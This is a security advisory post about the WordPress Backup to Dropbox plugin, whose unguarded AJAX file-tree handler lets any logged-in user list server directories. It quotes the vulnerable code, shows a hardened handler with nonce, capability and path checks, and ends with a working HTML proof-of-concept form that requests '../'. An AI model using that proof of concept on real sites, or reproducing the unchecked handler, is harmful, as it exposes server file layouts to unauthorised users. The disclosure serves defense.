A Recently Closed Plugin Contains a Vulnerability That Allows Anyone Logged in to WordPress to View Directory Listings
Today we had somebody contact us asking if we had any insight into why the plugin WordPress Backup to Dropbox was removed from the Plugin Directory (after seeing one of yesterday’s posts). Our guess would be that it has to do with the plugin no longer working, but while taking a quick look over the plugin we did find a vulnerability in it that allows anyone logged in to WordPress to view a list of the files and directories in a directory on the server of their choosing.
The plugin makes the function backup_to_dropbox_file_tree() accessible to anyone logged in to WordPress through WordPress’ AJAX functionality:
```php
add_action('wp_ajax_file_tree', 'backup_to_dropbox_file_tree');
```
That function will load up the file /Views/wpb2d-file-tree.php:
```php
function backup_to_dropbox_file_tree() {
    include 'Views/wpb2d-file-tree.php';
    die();
}
```
That file lists the files and directories located in the directory specified by the POST input “dir”. The wp_ajax_ hook fires for any logged-in user, whatever their role, and the callback shown above performs no capability check and no nonce check before including the view, so nothing restricts who can request the listing or which directory they ask for.
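For comparison, this is how the same AJAX handler would look with the missing controls in place. It is an added example written for this post, not the plugin’s own code: the function names wpb2d_example_file_tree() and wpb2d_example_confine_path() and the nonce action name “wpb2d_file_tree” are assumptions, while add_action(), check_ajax_referer(), current_user_can(), wp_unslash(), wp_send_json_error(), wp_send_json_success() and ABSPATH are the real WordPress APIs and constant.

```php
<?php
// Added example, not code from the WordPress Backup to Dropbox plugin.
// A hardened replacement for the file-tree AJAX handler: it requires a nonce,
// requires an administrator-level capability, and confines the requested
// directory to the WordPress install.

add_action('wp_ajax_file_tree', 'wpb2d_example_file_tree');

function wpb2d_example_file_tree() {
    // 1. Nonce check: a cross-site form like the proof of concept cannot
    //    supply a valid nonce, so the request dies here. The admin page that
    //    legitimately calls this endpoint must send the value of
    //    wp_create_nonce('wpb2d_file_tree') in the POST field "nonce".
    check_ajax_referer('wpb2d_file_tree', 'nonce');

    // 2. Capability check: browsing the server's directories is an
    //    administrator feature. Subscribers and other low-privileged
    //    accounts are logged in, but they should get nothing from this hook.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    // 3. Path confinement: resolve the requested directory and refuse
    //    anything that does not stay inside ABSPATH, so "../" cannot
    //    walk out of the WordPress install.
    $requested = isset($_POST['dir']) ? wp_unslash($_POST['dir']) : '';
    $dir = wpb2d_example_confine_path($requested, ABSPATH);
    if ($dir === false) {
        wp_send_json_error('directory not allowed', 400);
    }

    $entries = array();
    foreach (scandir($dir) as $name) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $entries[] = array(
            'name' => $name,
            'type' => is_dir($dir . DIRECTORY_SEPARATOR . $name) ? 'dir' : 'file',
        );
    }
    wp_send_json_success($entries);
}

/**
 * Hypothetical helper: return the canonical path of $base/$relative if it is
 * an existing directory inside $base, otherwise false.
 */
function wpb2d_example_confine_path($relative, $base) {
    $base = realpath($base);
    if ($base === false) {
        return false;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR);

    // realpath() resolves "..", symlinks and duplicate separators, so the
    // comparison below is made on the real location, not the supplied string.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false || !is_dir($candidate)) {
        return false;
    }

    // Compare against the base plus a trailing separator so that
    // "/var/www/html" does not accidentally accept "/var/www/html-other".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $candidate;
}
```

The order matters: check_ajax_referer() and current_user_can() run before “dir” is even read, so an unprivileged or forged request never reaches the filesystem. With these checks in place the proof of concept below returns nothing useful, because the form carries no nonce and the hook no longer serves non-administrators.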
Proof of Concept
The following proof of concept will return a listing of the files and directories in the root directory of the WordPress install when submitted while logged in to WordPress (the “dir” value “../” is resolved relative to the wp-admin directory). The contents of the resulting page are hidden using “display: none” styling, so you either need to remove that styling or view the page’s source to see the results.
Make sure to replace “[path to WordPress]” with the location of WordPress.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=file_tree" method="POST">
<input type="hidden" name="dir" value="../" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```